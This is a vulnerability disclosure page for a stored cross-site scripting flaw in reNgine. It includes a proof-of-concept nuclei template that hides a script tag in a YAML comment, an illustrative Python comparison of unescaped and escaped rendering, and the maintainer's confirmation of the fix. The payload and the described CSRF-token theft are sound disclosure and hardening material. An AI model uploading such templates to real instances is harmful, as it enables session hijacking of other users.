Cross-site Scripting (XSS) - Stored in yogeshojha/rengine

Valid

Reported on

Aug 31st 2021


✍️ Description

Hi, when creating a template for nuclei, it is possible to upload a malicious template with an XSS payload; clicking to view this template will run the XSS.

🕵️‍♂️ Proof of Concept

1- First, create the fake template:

id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low

requests:
  - method: GET
    path:
        - "{{BaseURL}}/"

    matchers:
      - type: regex
        regex:
          - "\\<title\\>poc\\s"
        part: body

2- Upload this template, and click to view it!

💥 Impact

It's possible to leak the csrftoken of users and bypass this feature, performing a CSRF attack against other accounts.
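As an added illustration (not reNgine's code and not the fix in commit ab89a2), the following Python contrasts the vulnerable pattern behind this report, inserting the uploaded template body into the view page verbatim so the `<script>` hidden in a YAML comment becomes live HTML next to the page's CSRF token, with HTML-escaping the body at output time. The page skeleton, the token value and the function names are constructed for the example.

```python
import html
import re

# Constructed copy of the PoC template from the report; nuclei treats the
# second line as a comment, but a browser treats it as markup.
POC_TEMPLATE = """id: poc-xss
#<script>alert(1)</script>
info:
  name: xss-storage-rengine
  author: phor3nsic
  severity: low
"""

# Constructed stand-in for a Django-style template view. The hidden CSRF
# field is what an injected script could read out of the same document.
PAGE = (
    "<html><body>"
    "<form><input type='hidden' name='csrfmiddlewaretoken' value='{csrf}'></form>"
    "<h1>Template: {name}</h1><pre>{body}</pre>"
    "</body></html>"
)
CSRF_PLACEHOLDER = "CONSTRUCTED-CSRF-TOKEN"


def render_unsafe(name: str, body: str) -> str:
    """Vulnerable pattern: user-controlled file content dropped into the page as-is."""
    return PAGE.format(csrf=CSRF_PLACEHOLDER, name=name, body=body)


def render_escaped(name: str, body: str) -> str:
    """Hardened pattern: HTML-escape every user-controlled value at output time.

    quote=True also escapes ' and ", so the same helper is safe inside attributes."""
    return PAGE.format(
        csrf=CSRF_PLACEHOLDER,
        name=html.escape(name, quote=True),
        body=html.escape(body, quote=True),
    )


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(rendered_html: str) -> bool:
    """Regression check a test suite can run over rendered views: is there an
    unescaped <script tag in the output? Escaped content becomes &lt;script&gt;."""
    return SCRIPT_TAG.search(rendered_html) is not None
```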

We have contacted a member of the yogeshojha/rengine team and are waiting to hear back 2 years ago
Yogesh Ojha validated this vulnerability 2 years ago
Walleson Moura has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yogesh Ojha
2 years ago

Maintainer


This is a good finding. Though the exploitability is very unlikely. You'd have to convince a user to upload a malicious nuclei template. And since we are likely to not have CSRF, the only way you could deliver the payload is probably social engineering.

Nevertheless, a very good finding. This means you guys are hunting bugs literally everywhere lol :D Good job.

Patch is on its way

Yogesh Ojha marked this as fixed with commit ab89a2 2 years ago
Yogesh Ojha has been awarded the fix bounty
This vulnerability will not receive a CVE
Yogesh Ojha
2 years ago

Maintainer


Thank you for reporting this. I've pushed the patches. Additionally, I've also fixed XSS for Tool config input box, and GF patterns upload as well.

You may retest them and update me if you find any other instances of XSS.

Thank you again for reporting this and I very much appreciate it.

Thank you for making open source secure <3

Yogesh Ojha
2 years ago

Maintainer


Also, congratulations on this bounty. I look forward to many more such reports.

Walleson Moura
2 years ago

Researcher


Hi, Thanks for the reward, but what makes me happy is to contribute to the tool! :)
